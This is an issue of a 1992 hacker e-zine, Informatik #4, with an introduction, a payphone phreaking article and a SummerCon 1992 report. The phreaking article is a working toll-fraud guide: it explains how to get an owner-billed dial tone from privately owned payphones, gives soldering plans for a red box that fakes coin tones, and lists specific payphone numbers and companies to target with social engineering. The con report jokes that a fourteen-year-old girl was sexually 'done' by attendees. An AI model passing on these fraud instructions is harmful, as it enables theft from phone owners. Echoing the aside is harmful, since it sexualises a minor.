home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / INFORM_4.ZIP / INFORM-4
Text File  |  1993-03-31  |  141KB  |  3,036 lines

  1. +=============================================================================+
  2. |    ##  ##  ##  ###### ######  ######   ### ###     ###### ######  ##  ## ## |
  3. |   ##  ### ##  ##     ##  ##  ##  ##   ## ## ##    ##  ##   ##    ##  ## ##  |
  4. |  ##  ## ###  #####  ##  ##  ######   ##     ##   ######   ##    ##  ####    |
  5. | ##  ##  ##  ##     ######  ##   ##  ##      ##  ##  ##   ##    ##  ##  ##   |
  6. +=============================================##==============================+
  7. |                                                                July 08, 1992|
  8. |                   [ The Journal of Privileged Information ]                 |
  9. |                                                                             |
  10. +-----------------------------------------------------------------------------+
  11. | Issue 04                                                By: 'Above the Law' |
  12. +-----------------------------------------------------------------------------+
  13. |                                                                             |
  14. |Informatik--Bringing you all the information you should know...              |
  15. |            and a lot you shouldn't...                                       |
  16. |                                                                             |
  17. +=============================================================================+
  18.  
  19.  
  20.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  21.  
  22.     *DISCLAIMER*
  23.         Informatik Journal is printed for informational purposes only.  We
  24.         do not recommend or condone any illegal or fraudulent application of
  25.         the information found in this electronic magazine.  As such, we
  26.         accept no liability for any criminal or civil disputes arising from
  27.         said information.
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30.  
  31.  
  32.  
  33.  
  34.                   ===========================================
  35.                   ============== - CONTENTS - ===============
  36.                   ================ Issue 04 =================
  37.                   ======= Release date   July 08, 1992  =====
  38.                   ===========================================
  39.  
  40.  
  41. 01)  Issue #4 Introduction
  42.      By:  Informatik Staff
  43.  
  44. 02)  COCOTS and the COMBO box
  45.      By:  Count Zero
  46.  
  47. 04)  SummerCon 1992
  48.      By:  Holistic Hacker
  49.  
  50. 05)  HP's SECURITY/3000 (part 2 of 3)
  51.      By:  Sterling
  52.  
  53. 06)  The Demon Dialer
  54.      By:  Vodka
  55.  
  56. 07)  The Kerberos Authentication System - An Intoduction
  57.      By:  x0d
  58.  
  59. 08)  Computer Crime Investigation
  60.      By:  C. D. Morgan
  61.  
  62. 09)  WAX or the Discovery of Televison Among the Bees
  63.      By:  David Blair
  64.  
  65. 10)  Tid-Bytes--Misc Contributions
  66.      By:  Informatik Staff           
  67.  
  68. 11)  Submission, Subscription and Publication Information
  69.      By:  Informatik Staff
  70.  
  71.  
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73.  
  74.  
  75.  
  76.  
  77. /* Introduction */
  78.    By Mack Hammer
  79.  
  80.  
  81.  
  82.  
  83. Welcome to Informatik Issue #4.  Thanks to some submissions, we are able to 
  84. release this issue scarcely two months after issue 3.  We hope to continue 
  85. providing the same informative and entertaing information that has marked the
  86. last three issues.  Keep those submissions coming!
  87.  
  88. This month we are focusing on hacking and phreaking, although we plan on 
  89. printing information on other high technology hacks in the future.  We also 
  90. have an exceptionally interesting and useful article from C. D. Morgan about 
  91. computer crime investigation. In Tid-Bytes this issue, we have information
  92. on the final run of the infamous LOD T-Shirts, and we have the fabulous 
  93. Spot-the-Fed Word Search, courtesty of the Informatik Staff.  
  94.  
  95. For your enjoyment, we have included a report on Summercon by Holistic Hacker,
  96. Informatik's reporter who was live on the scene.  Unfortunately, neither of 
  97. the members of our illustrious editorial staff could make it to the Con this
  98. year.  Everyone I have spoken to has had nothing but raves for the Con, and it
  99. seems to once again have been a success.  I heard there were approximately
  100. 80 people there, although I can't be sure since I don't have a guest list.  For
  101. this, we have Knight Lightning to thank.  In the best interests of Phrack
  102. magazine, he has decided not to give us the guest list, and I hope to one day
  103. have the opportunity to repay his generosity.
  104.  
  105. Once again, we appreciate your readership and hope you like the magazine.
  106. We welcome any suggestions, comments and submissions. See the end of this
  107. magazine for more information.
  108.     
  109.                                             Enjoy,
  110.  
  111.                                             Mack Hammer & Sterling
  112.                                                   [Editors]
  113.  
  114.  
  115. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  116.  
  117.  
  118.  
  119.  
  120.  
  121.                              COCOTS and COMBO-box
  122.                        by Count Zero of Renegade Legion
  123.  
  124. Here's my phile on how to build a redbox.  The file is ALSO about COCOTS...but
  125. is has DETAILED plans for the COMBO-box COMBO-box = red box + clear box here it
  126. is...enjoy!
  127.  
  128.  
  129.                       R e n e g a d e   L e g i o n
  130.    * *              T e c h n i c a l   R e p o r t s                  * *
  131.   * R *                                                               * L *
  132.     *                                                                   *
  133.  
  134.         Eastern                                               Western
  135.                                 ....
  136. Net Runner                      ........                               Echoman
  137. The Knight                       .........                               Sirus
  138. Kingpin                          ...    ....
  139. Highlander                       ... ....
  140. Count Zero                       .....
  141. Iceberg                         ....
  142. The Gypsy                        ....
  143. Cursor                           ... ...
  144. Rogue                            ...   ...
  145. White Knight                     ..      ...
  146. Nemesis                                    ...
  147.  
  148.                                 Presents
  149.  
  150. Report Number: 4.0
  151.  
  152. COCOTS: Uses for privatly operated public telephones. How to make free calls
  153.         use their maintenance features, and plans for a tone dialer to fool
  154.         COCOT security systems.
  155.  
  156. Author   : Count Zero
  157. Editor   : Net Runner
  158. System   : COCOT Payphones
  159. Uses     : Free calling to most of the world
  160. Dialups  : One per payphone
  161. Port     : 300 bps, 7 bits, Even Pairity, 1 Stop Bit
  162. Emulation: TTY
  163. Thanks To: Count Zero for this extensive document.
  164. Greets To: Magic Man, Darby, JT, Muppet, Madmike, Falcon, George Bush,
  165.            FBI Agent, Net Runner, Canine, Plutus, Midnight Mage, Yellow Jacket
  166.            Old Pink, The Knight, Spiritwalker
  167.  
  168.  
  169. Renegade Legion Sites
  170. ---------------------
  171. - tmp down -       Night City   < RL World HQ >
  172. - private  -       Night Elite  < ERL Headquarters >
  173.  
  174.  Contact The Knight or Net Runner for the number to Night Elite
  175.  
  176.  
  177.    So you're walking down the street and you see a payphone gotta make an
  178. important call, so you dig into your pocket to get a dime picking up the
  179. handset, you suddenly notice that the payphone wants a QUARTER for a local
  180. call!  What the hell, and WHERE did this synthesized voice come from?
  181.  
  182.   Let's make this phile short and to the point a COCOT is an acronym for
  183. Customer Owned Coin Operated Telefone in other words, a COCOT is a fone OWNED
  184. or RENTED by a PAYING CUSTOMER (most likely, a hotel or donut shop) a COCOT is
  185. NOT a normal payfone the Telco doesn't own it, and the actual fone line is
  186. usually a normal customer loop (unlike payfones, where the fone line is a
  187. "special" payfone loop, allowing the use of "coin tones" to indicate money
  188. dropped in more on this later) SO!..A COCOT may LOOK and SMELL like a telco
  189. payphone, but it is NOT.
  190.  
  191. * Why do COCOTs exist?
  192.  
  193.   Simple $$$$$$$!  A customer owned payfone is money in the bank!  You pay MORE
  194. for local calls and long distance is typically handled by sleazy carriers that
  195. offer bad/EXPENSIVE service the owner/renter of the COCOT opens the coinbox and
  196. keeps the money him/herself!  Also, a particularly SLEAZY quality of a COCOT is
  197. the fact that it DOES NOT RECIEVE INCOMING CALLS this, of course, is because of
  198. $$ if people are calling IN to a COCOT, the COCOT is not making money and
  199. businesses always want to make as much $$ as possible...even if it hurts the
  200. consumer (think about it..it REALLY sucks calling someone at home from a COCOT,
  201. then not be able to have him/her call you back to save $$ "Guess I'll have to
  202. keep feeding the COCOT quarters!")
  203.  
  204. * Where is a good place to look for COCOTs?
  205.  
  206.   Outside Dunkin Donut shops, restaurants, clubs, bars, and outside/inside
  207. hotels "convenient" locations
  208.  
  209.  
  210. *  How do I figure out if I have found a COCOT?
  211.  
  212.   Simple a COCOT will have NO TELCO LOGOS on it no New England Telephone
  213. symbols it may look just like a Telco fone chrome, with blue stickers and all
  214. that ALSO a COCOT typically charges MORE for a local call than a regular Telco
  215. payfone (in Massachusetts, local calls are a dime, in places like NYC, they are
  216. 25 cents.) a COCOT will most often have a synthesized voice that asks you to
  217. "please deposit 25 cents" or whatever ALSO some FaNcY COCOTS will not look like
  218. payfones at all some in hotels have weird LCD displays and look totally
  219. different but the ALWAYS charge you more than a normal payphone.
  220.  
  221. *  OK, I found this weird payphone in Boston that wants a quarter, and this
  222.  synthesized voice is harassing me when does the phun begin?
  223.  
  224.   Soon..first of all, you must understand that the COCOT is a mimic.
  225. Essentially, it wants you to think that it is just a plain ol' payfone pick up
  226. the handset..hear that dialtone?  hah!  that dialtone is fake, synthesized by
  227. the innards of the COCOT you are at the mercy of the COCOT.  Remember a COCOT
  228. runs off of a normal customer loop so unlike a Telco payphone where you must
  229. deposit money to generate coin tones that are read by the CO, the security of a
  230. COCOT depends solely on the COCOT fone itself its as if you took your own fone
  231. and put a sign on it saying "Please put 10 cents in this jar for every call you
  232. make." COCOTS are not naiive they won't let you near the unrestricted dialtone
  233. until you fork over the cash-ola heh heh.  Or so they THINK!
  234.  
  235.   See, the Achilles heel of the COCOT is the FACT that ALL PAYFONES MUST LET
  236. YOU MAKE 1-800 CALLS FOR FREE!  It's not just a fact, it's the LAW so, now pick
  237. up the handset again and place a 1-800 call any 1-800 number will do.  When
  238. they answer at the other end, just sit there do nothing ignore them.  wait for
  239. them to hang up the fone here's an example.
  240.  
  241. <DIAL 1-800-LOAN-YES>
  242.  
  243. <Ring, Ring>.....<click> "Hello, you wanna buy some money? Hello? HELLO?!"
  244.  
  245. <CLICK>
  246.  
  247. <You will now hear some static and probably a strange "waffling" noise, like
  248.   chh,chh,chh,chh,chh>
  249.  
  250. <CLICK>......DIALTONE!
  251.  
  252.   NOW!.what have we got here?  a dialtone?  yes, you guessed it, the dialtone
  253. you now hear is the UNRESTRICED dialtone of the COCOT's customer loop.
  254.  
  255. * So what?..So I got an "unrestricted dialtone"...big deal?
  256.  
  257.   Meathead!  with an UNRESTRICTED dialtone, all you need to do is place a call
  258. via DTMF tones (the tones a touch-tone keypad generates) now, try dialing a
  259. number with the COCOTs keypad WHOA!  waitasec, no sound!  this is a typical
  260. lame attempt at protection by the COCOT.  Just whip out your Radio Shack pocket
  261. tone dialer, and try calling a number ANY number place it just as if you were
  262. calling from a home phone call a 1-900 sex line call Guam you are FREE and the
  263. COCOTs customer loop is being billed!
  264.  
  265. ***NOTE:  some COCOTS are more sophisticated at protecting themselves..some
  266. will RESET when they hear the dialtone to get around this, make a loud hissing
  267. sound with your mouth into the mouthpiece after the 1-800 number hangs up also,
  268. get your tone dialer ready near the mouthpiece when u hear the dialtone,
  269. quickly dial the first digit of your number to call if you hiss loudly enough,
  270. you MAY be able to mask the sound of the dialtone and prevent the COCOT from
  271. resetting and once you dial the first digit of the number you are calling, the
  272. dialtone will disappear (naturally) ok, you can stop hissing like an idiot now
  273. finish dialing your PHREE fone call.
  274.  
  275.   Also, some COCOTs actually disable the handset after a call hangs up (in
  276. other words, you can't send DTMF tones thru the mouthpiece) oh well, better
  277. luck next time.
  278.  
  279. HOWEVER MOST of the COCOTs I have run across ONLY disable the DTMF keypad..  so
  280. all you need is a pocket dialer to circumvent this!
  281.  
  282. OTHER THINGS TO KNOW:  Sure, you can't call a COCOT, but it DOES have a number
  283. to find out the COCOT's number, call 1-800-933-3258..this automated ANI service
  284. will tell you the number you're dialing from now, try calling the COCOT from
  285. another fone you will hear one of 2 things:
  286.  
  287.                  1) synthesized voice "Thank you"...CLICK..<hang up>
  288.                  2) weird carrier
  289.  
  290. A COCOT's number is ONLY used by the company that BUILT the COCOT by calling up
  291. a COCOT, a tech.  can monitor its functioning, etc in case (1), you must enter
  292. a 3 or 4 digit password and then you'll get into a voice menu driven program
  293. that'll let you do "maintenance" stuff with the COCOT in case (2), you are
  294. hooked to the COCOT's 300 bps modem (YES, a MODEM in a PAYFONE)..  likewise, if
  295. you can figure out the communication settings, you'll be into the COCOT's
  296. maintenance routines.
  297.  
  298. Personally, I haven't had much luck (or patience) with calling up and hacking
  299. COCOT maintenance functions. I just like making free fone calls from 'em!
  300.  
  301.  
  302. COCOT ETIQUETTE:
  303.  Now, remember, you are making free fone calls but SOMEONE has to pay for
  304. 'em...and that is the OWNER the COCOT's customer loop is billed the cost of the
  305. calls, and if the OWNER sees a big difference in the profits made on the COCOT
  306. (profit=coins from COCOT - bill from Telco for customer loop)..they'll know
  307. SOMETHING is up so moral is DON'T ABUSE THEM!  don't call a 1-900 number and
  308. stay on the line for 12 hours!  If a COCOT is abused SEVERLY, an owner will
  309. eventually LOSE money on the damn thing!, and that means BYE BYE COCOT also,
  310. remember that a RECORD of ALL LONG DISTANCE calls is made to the COCOT's
  311. customer loop..and COCOT companies will sometimes investigate "billing
  312. discrepencies" so don't call anyone you personally know unless you are sure
  313. they are "cool".
  314.  
  315. <RING RING> "Hello?"
  316.  
  317.        "Hello...this is Cointel, Inc....we'd like to ask you a few
  318.         questions about a call you received from Boston on 2/12/91.
  319.         Could you tell us the name and address of the person who
  320.         placed the call?"
  321.  
  322.     COOL dude -> "What?...I don't remember...go to hell! <SLAM>"
  323.     MEATHEAD -> "Uh, sure, his name is John Smith...you want his address too?"
  324.  
  325. Get the picture? Good...
  326.  
  327. COCOTs are a great resource if we use them wisely like our environment, we
  328. gotta be careful not to plunder them make a few long distance calls and then
  329. leave that particular COCOT alone for awhile chances are, your bills will be
  330. "absorbed" by the profit margin of the owner and probably ignored but the
  331. smaller the owner's profit margin gets,the more likely suspicions will be
  332. aroused 'nuff said!
  333.  
  334. I have found COCOTs EVERYWHERE some of my personal favorites are on Route 1
  335. North of Boston check out the Dunkin Donut shops and the Burger King also, in
  336. front of the Rat in Kenmore look around they are lurking everywhere.
  337. (BUT..COCOT technology is relatively new..don't expect them EVERYWHERE..I know
  338. many towns that have NONE..check out big cities....) Here are some numbers of
  339. COCOTs:
  340.                  Kenmore Square,Boston,MA The Rat
  341.                      617/247-8195
  342.                      617/247-7913
  343.                      617/247-8208
  344.                      617/247-9437
  345.  
  346.   Random ones: 617/720-4430   617/233-9872
  347.  
  348. Here are some companies that deal with COCOTs...try out your social
  349. engineering skill on them:
  350.  
  351.               Cointel, Inc.               Int'l Telecharge, Inc.
  352.             130 Broadway St.               P.O. Box 50579
  353.             Somerville, MA                 Dallas, TX
  354.                        02145            1800/999-5152
  355.              1800/322-7741
  356.  
  357.  
  358. As for a Tone Dialer, don't leave home without one!...a true phreak always has
  359. a DTMF tone dialer at hand..along with a red box!....My personal favorite is
  360. the COMBO-BOX (red box plus DTMF) take a Radio Shack 33-memory Pocket Dialer..
  361. open up the back...remove the little 3.579 MHz crystal (looks like a metal
  362. cylinder..unsolder it)...solder on a couple of thin, insulated wires where the
  363. crystal was attached...thread the wires thru one of the "vents" in the back of
  364. the tone dialer....get ahold of a 6.5536 MHz crystal (available thru Fry's
  365. Electronics, 89 cents a piece, phone number 415/770-3763)..go out and get some
  366. quick drying epoxy and a Radio Shack mini Toggle Switch, DPDT, cat.  no 275-626
  367.  
  368. Close the tone dialer, with the two wires sticking out one of the back vents..
  369. screw it up tight...now, attact the crystals and wires to the switch like this
  370. with solder:
  371.                               I^^^^^I
  372.                               I      xx  <3.579 crystal>small one
  373.                               I     I
  374.  toggle switch    ->   oooooo X      xxxxs <two wires>
  375.                               I     I
  376.                               I      xx  <6.5536 crystal>big one
  377.                               I     I
  378.                                ^^^^^^
  379.  
  380. Each "xx" prong in the diagram is actually TWO prongs....hook up the two leads
  381. from the crystals to separate prongs (same with the wires).
  382.  
  383. Now, epoxy this gizmo to the side of the tone dialer use ALOT of epoxy, as you
  384. must make the switch/crystals essentially EMBEDDED in epoxy resin. like this:
  385.  
  386.  
  387. Front View ->       ----------------------
  388.                     I                    I T <-toggle switch
  389.                     I  oo    oo     oo   I---
  390.                     I                    I  |
  391.                     I                    I---
  392.                     I   1    2     3     I B s <-two crystals(b=big,s=small)
  393.                     I                    I  |     in epoxy "blob"
  394.                     I   4    5     6     I _
  395.                     I                    I
  396.                     I   7    8     9     I  ^two wires running to back of unit
  397.                     I                    I
  398.                     I   *    0     #     I
  399.                     I                    I
  400.                     ----------------------
  401.  
  402.                     ----------------------
  403. Back View ->        I                    I
  404.                  T  I  o      ----   o-----------------------vent (1 of 4)
  405.                 --- I    /               |   I
  406.                 s B I   |            |   I
  407.  2 wires    ->   \-----o      ----   o   I
  408.  running into       I                    I
  409.  vent               I                    I
  410.                     I                    I
  411.                     I                    I
  412.                     I                    I
  413.                     ----------------------
  414.  
  415. Make sure the epoxy is really gobbed on there..you want to be certaint the
  416. switch and crystals are firmly attached and secure in a matrix of epoxy (it
  417. doesn't conduct electricity, so don't worry about shorting out the connections
  418. to the toggle switch)...just don't gum up the action of the switch!
  419.  
  420. Basically, you've altered the device so you can select between 2 crystals to
  421. generate the timing for the microprocessor in the tone dialer...
  422.  
  423. Now turn on the tone dialer NOW, you can easily switch between the 2 crystal
  424. types the small crystal will generate ordinary DTMF tones but, by simply
  425. flicking the switch, you generate HIGHER tones now, using the memory function
  426. of the tone dialer, save 5 "*" in the P1 location, now dial the P1 location
  427. using the BIG crystal, sure sounds like the tones for a QUARTER, doesn't it!
  428.  
  429. Carry this around with you always will come in handy with both Telco payphones
  430. AND COCOTs! no Phreak should be without one!
  431.  
  432. Anyway, that about wraps it up for me references for this article include Noah
  433. Clayton's EXCELLENT article on COCOTs in 2600 Magazine, Autumn 1990..  also,
  434. The Plague's article on Tone Dialer conversion to Red Box, 2600 Magazine,
  435. Summer 1990 (Which inspired me to create the COMBO-BOX (red box PLUS DTMF
  436. dialer)...I strongly urge people to subscribe to 2600 Magazine...call their
  437. office line for more details ->516/751-2600...  Remember..you can READ all you
  438. want, but if you don't get your ASS out there and try stuff out for yourself,
  439. you are nothing but a POSER!
  440.  
  441. Enough said...oh, also, I heard that SOME COCOTs have handsets in them that
  442. can be accessed..in other words, you call the COCOT and if you hit "0" or
  443. something else, the earpiece of the handset is activated and you can listen in
  444. on what's goin on around the COCOT...I dunno...never worked for me, but try
  445. these 2 "suspected" numbers...212/268-7538, -6129..try hitting "0" and listen
  446. for any sounds...I could be wrong, I could be right..I could be black, I could
  447. be white....
  448.  
  449. That's all folks remember, the purpose of this phile is to ENLIGHTEN, and I
  450. in no way condone or encourage illegal activities...so don't blame me for ANY
  451. MESS you get into this phile offered strictly as INFORMATIONAL ONLY!  I am in
  452. no way responsible for your ass!  Also, I am not into wanton destruction,
  453. vandalism, or fraud..seek the truth, and leave nothing but footsteps.
  454.  
  455. Remember...SHARE THE WEALTH...INFORMATION IS POWER...SHARE IT!
  456.  
  457. And drink massive amounts of Jolt cola...trust me, it's good for you.
  458.  
  459.  
  460. Keep the faith, and never stop searching for new frontiers....
  461.  
  462.                     ..................................
  463.  
  464.                        ..oooOO Count Zero OOooo..
  465.  
  466.                     ..................................
  467.  
  468. -----------------------------------------------------------------------------
  469. EDITOR'S NOTE: (Renegade Legion)
  470.  
  471. We do NOT condone fraud, destruction of computer data or tangeble items.
  472. We do not condone information hoarding, and accumulations stacks of informatio
  473. n on individuals which corporations have no business accumulating. Companies
  474. are free to give your information to other companies. And we feel vindicated
  475. in examining the information about ourselves firsthand!
  476.  
  477. Down with buerocracy!
  478.  
  479. Hail Eris!
  480. All Hail Discordia!
  481.  
  482. -Net Runner, Precentor of Renegade Legion
  483.  
  484. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  485.  
  486.  
  487.  
  488.  
  489.  
  490.  
  491.                                 SummerCon 1992
  492.                               by Holistic Hacker
  493.  
  494. Phrack's SummerCon 1992 turned out great.  Unforunately neither of our editors
  495. could attend due to pesky problems like work, school, and an extreme lack of
  496. cash.  Never fear though, our on-the-spot reporter Holistic Hacker gives us the
  497. low-down on this year's summer bash.
  498.  
  499. /*
  500.  
  501.      From June 26 through June 28, the Executive International Inn in St.
  502. Louis, MO, was overrun by the participants of SummerCon '92.  This year's Con
  503. was one of the largest in attendance - Knight Lightning estimates that over 75
  504. people showed up for the activities this year.
  505.  
  506. Friday - June 26
  507.  
  508.      Doc Cypher and I arrived around 4:30 PM and found the hotel already full
  509. of action.  The much-ballyhooed Phrack SummerCon t-shirts had already sold out
  510. by the time we had arrived (although Dispater is making another print run of
  511. them).  Alcohol was already in presence, and people stood in the halls
  512. acquainting themselves with one another.
  513.  
  514.      Friday night was dominated by 'Batman Returns.' Many hackers went to see
  515. the movie throughout the night, leaving pockets of other hackers scattered
  516. around the hotel.  Some people contented themselves by exploring the hotel, the
  517. parking garage, and the adjoining Mark Twain Bank.  After a brief trip to the
  518. Radisson for the free buffet of mini tacos (umm-umm) and a stop by a local
  519. liquor shop, the remaining hackers were ready to party.  Led by the
  520. always-partying Hunter, we staked out the pool as hacker turf.  This is were we
  521. found the infamous hacker groupies of SummerCon, but more about them later.
  522.  
  523.      After bullshitting and drinking by the pool for a while, some peopl went
  524. out trashing, others went to the bar, and some sat around talking about various
  525. systems and hacks.  Constant cries of 'Let's go get some women!' were heard
  526. throughout the night.
  527.  
  528.      The majority of the people at the hotel eventually made it to the RDT room
  529. located at one end of the hotel.  Everyone sat around and amused themselves
  530. with the antics of the previously-mentioned Cyber Nymphs, a seventeen-year-old
  531. and her fourteen-year-old-friend.  The seventeen-year-old eventually
  532. disappeared, never to be seen again, while the fourteen-year-old tried to hug
  533. everyone who came near her.  Rumor has it they were both done by several
  534. hackers that night...
  535.  
  536.      Around 2:00 AM, most people started to crash in preparation for the actual
  537. conference on Saturday.
  538.  
  539. Saturday - June 27
  540.  
  541.      Due to many late-risers and conflicting times, the conference was
  542. rescheduled from 12 noon to 1:00 PM.  About 60 hackers filled the conference
  543. room on the second floor of the hotel.  Sample copies of Cybertek and Security
  544. Insider Report were available, as was an ad for Intertek.  Copies of Erik
  545. Bloodaxe's Computerworld article and a story from The Boston Business Journal
  546. were present as well.  Emmanuel Goldstein was present hawking back issues of
  547. 2600.
  548.  
  549.      Knight Lightning started off the conference with the banging of a
  550. linesman's set on the table.  He expressed appreciation for the number of
  551. people who showed up, roughly two or three times as many as had showed up at
  552. past SummerCons.  Rambone made a quick note of how the activites couldn't get
  553. any worse than the previous night's, with much joking about the hacker chicks
  554. coming from all.  Dispater welcomed everyone to the Con.  He also expressed his
  555. gratitude for RDT's help wit Phrack over the last few months.  Dispater then
  556. made mention in passing that the government had recently purchased the hotel.
  557. Buttons from RDT and h0d were mentioned, along with the Phrack SummerCon
  558. t-shirts and the 2600 t-shirts.
  559.  
  560.      Gatsby was the first speaker of the Con, discussing the San Diego
  561. '1000-member hacker ring' that many people have heard tale in the last few
  562. months.  A hacker by the name of Prisoner from Long Island flew to San Diego to
  563. see a girl, supposedly on a carded ticket.  While there, he broke into a Zale's
  564. jewelry store and pulled credit card info from their point-of-sales system.  He
  565. soon left his rented room, leaving behind the credit card printouts which his
  566. landlord reported to the San Diego Police Department.  He was soon met at the
  567. Sleepy Time Motel in San Diego by the police.  The FBI was soon brought into
  568. the case, and he was kept at the Marriot Hotel for two weeks.  While there, he
  569. called several systems, including Scantronics.  In the case of the
  570. investigation, a guy going by The Crypt Keeper was intereviewed.  When told by
  571. Barry Sadler of the San Diego PD that he was interfering with the
  572. investigation, he soon opened his mouth and used Gatsby's account to give the
  573. feds info on Scantronics.  Bufferings from Scantronics were used as probable
  574. cause to get a search warrant for the board.  Kludge now has a couple of
  575. charges against him, thanks to the narc efforts of The Crypt Keeper.
  576.  
  577.      Emmanuel Goldstein of 2600 Magazine was the next to speak.  He related how
  578. 2600, in eight years of existence, had never been directly harassed by the
  579. government.  Emmanuel also mentioned how 2600 was in good legal shape since it
  580. was a printed publication, unlike Phrack.  He told us how 2600 is in need of
  581. articles, and how 2600 will print anything leaked and/or sent to them.
  582. Emmanuel mentioned that 2600 had never been sued, although they have been
  583. threatened with legal action before.  It was noted that 2600 currently has a
  584. mailing list of 1500 members with newstand circulation of 3000.  He talked a
  585. little bit about how 2600 issues press releases and information in order to
  586. alert people about unsecure systems, but that the information is never acted
  587. upon until something happens.  People would always blame the magazine for
  588. giving the details on how to do something (such as opening Fed Ex drop boxes),
  589. but never took action to correct the problem.
  590.  
  591.      Ctrl-C was the next speaker of the Con.  He discussed being caught by
  592. Michigan Bell security and how he started working in security for Michigan
  593. Bell.  After some shake-ups in the management, the new manager fired Ctrl-C.
  594. The Secret Service then decided to investigate and dragged him down to the
  595. local office.  A year-and-a-half later, he has not heard anything else from the
  596. Secret Service and considers himself in the clear He doesn't do anything with
  597. computers anymore, 'that's his story and he' sticking to it.'
  598.  
  599.      Signal Surfer spoke next of some beta-test software that he had available
  600. at the Con.  It was a Usenet news reader 'easy enough for your mother' that was
  601. being developed by the company he works for.  He also talked about how hackers
  602. are some of the best talent in the computer world and that they can make some
  603. great employees.  Signal Surfer said that he'd be happy to talk to anyone who
  604. was interested in getting a legitimate job in the computer industry.
  605.  
  606.      The sysop of Blitzkrieg BBS (sorry d00d, didn't catch yer name!) spoke
  607. next about a friend and him getting busted for carding a laptop, and the
  608. subsequent investigation.  This is the same guy who also puts out the new
  609. incarnation of TAP magazine.  He related how the feds tried to pressure him
  610. into giving them the subscriber's list.  He also talked about how a portion of
  611. his mail comes to him opened.  Some great legal manueverings there.  The feds
  612. also tried to get him to turn narc on a computer fencing ring in the area.  He
  613. mentioned how he still has the TAP membership logs and everyone will get the
  614. issues they have paid for.
  615.  
  616.      The staff from Cybertek spoke next about the delays in the new issue of
  617. their zine.  They mentioned that they have more time to work on it now, and
  618. that there will hopefully be no more delays in the publication of the new
  619. issue.
  620.  
  621.      Somewhere amidst all the talks, Agent Steal gave a very informative talk
  622. about his dealings with Kevin Poulson, aka Dark Dante.  If you weren't there,
  623. you missed quite a story.  Agent Steal related how Kevin was breaking into CO's
  624. on an almost daily basis and some of the equipmen he had set up in his
  625. apartment to prevent traces.  He related how he is now out of prison and is
  626. looking forward to something different.  He may have been talking about the
  627. Ozzy concert later that night...
  628.  
  629.      Erik Bloodaxe took the podium next to talk about what happened to Comsec,
  630. the MOD mess, and other topics in general.  Doc Holiday spoke up occasionally
  631. from his seat towards the back of the room.  ErikB said that the main problem
  632. Comsec faced was the debt they ran up trying to start the business.  This was
  633. mainly caused by one of their partners not putting up the money he promised and
  634. not having many paying clients.  Erik then explained how MOD affected Comsec
  635. and the lives of some of his and Doc Holliday's family members.  Erik also
  636. related some documents he had brought with him, including the termination
  637. letter of the president of Comsec and his article in a past Computerworld,
  638. among other item.  A debate then started over what a
  639. 'hacker-turned-businessman' can do when another hacker starts attacking them.
  640. The debate over this and other topics lasted over half-an-hour until we moved
  641. on to the final talk.
  642.  
  643.      Drunkfux talked a bit about some of the shit that happened at the the
  644. hotel after the last HoHoCon.  Bascically, the management tried to charge him
  645. for a hole knocked in a wall due to the conference room door being knocked into
  646. it.  After he refuted this charge, the hotel then had several holes knocked in
  647. the walls of the conference room and tried to charge him for these as well.
  648. They also complained about a mysterious fire which they could not locate.  dFx
  649. contacted a lawyer who soon had the hotel in his firm grip.  A few days later,
  650. the hotel sent two agents out to his house to apologize and give him some free
  651. travel vouchers for the Hilton of his choice.  With this, the official
  652. conference was over and activities soon got underway again.
  653.  
  654.      After the official conference talks, many people left the hotel to eat,
  655. trash, or explore the city.  Frosty and some of the other GCMS - MechWarriors
  656. started a game of Hacker in the conference room.  Many people soon made it over
  657. to the Northwest Plaza, home of some of the shittiest dress codes in the
  658. Midwest.  About ten of us were sitting around when a security guard informed a
  659. few of us that we couldn't wear our hats backwards and pointed out the cryptic
  660. Rule 4 - 'All clothing must be worn in the way it was meant to be worn.' Go
  661. figure - I always thought hats were worn on your head.  After a bit of this,
  662. Emmanuel Goldstein went to the local Sears store and bought a few of us St.
  663. Louis baseball caps.  With a few more backwards-hats, we strolled around the
  664. mall, soon catching the eye of another always-alert security guard.  After
  665. telling us to turn our hats around and dropping her walkie-talkie trying to
  666. call for backup, Emmanuel and a few of the guards began to discuss this Rule 4.
  667. One of the guards mumbled about how a case about this matter has gone to
  668. appellate court, but I haven't been able to find out anything certain of this.
  669. After being told that this policy was in fact posted at all entrances, we were
  670. kindly told to leave the store.  On our walk around the mall, we saw the
  671. mysterious rule board in two out of approximately 12 entrances.  One more
  672. thing, Rule 6 mentioned that there was to be no playing of cellular phones - I
  673. think ErikB broke this rule when he played 'Mary Had a Little Lamb' on the
  674. keypad of Signal Surfer's cellular phone.  We then drove back to the Con and
  675. related the story to the people we saw there.
  676.  
  677.      With nightfall, the activites once again began to happen around the hotel.
  678. Many trashing expeditions went out that night, some coming back with most el1te
  679. info.  We showed some videos in my room (and later Dispater's), including a
  680. re-run of 'Rudolph the Heavy-Metal Reindeer,' some news programs, including the
  681. 'Unsolved Mysteries' report on Kevin Poulson, and a screening of 'ESS Phun,' a
  682. trek inside a CO and the fun that can result.  After 10:00 many people began to
  683. split up.  Doc Cypher and I took off to pick up my girlfriend from Illinois and
  684. when we got back around 1:00, there had been some definite going-ons.  We heard
  685. reports about firecrackers being set off in the pool and a smoke bomb being set
  686. off on the second floor of C-block.  It was much later that John Frazel,
  687. security guard supreme, began making his famous 'Get back in your rooms, or
  688. you're going to jail' speech.  Most people congregated in the hall near the RDT
  689. room once again and engaged in swapping stories once again.  Bags of discarded
  690. trashing treasure started piling up in the stairwell as the night went on.
  691. Hacking of various systems continued to take place in the so-called SummerCon
  692. HQ.
  693.  
  694. Sunday - June 28
  695.  
  696.      I took off again to Illinois about 4:30 in the morning, with most of the
  697. hotel finally at rest.  When I returned about 6:00, I returned to my room to
  698. find all my stuff packed and Doc Cypher ready to get the hell out of there.  A
  699. report that there were '4000 cops' outside the hotel was floating around the
  700. buildings.  As we had planned to leave at 8:00 AM, this was no big deal for us.
  701. After checking out and retrieving my VCR from Dispater, we left the hotel to
  702. find no cops, just a few Navy officers scattered here and there.  We then hit
  703. the road and said goodbye to SummerCon '92.
  704.  
  705.  
  706. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
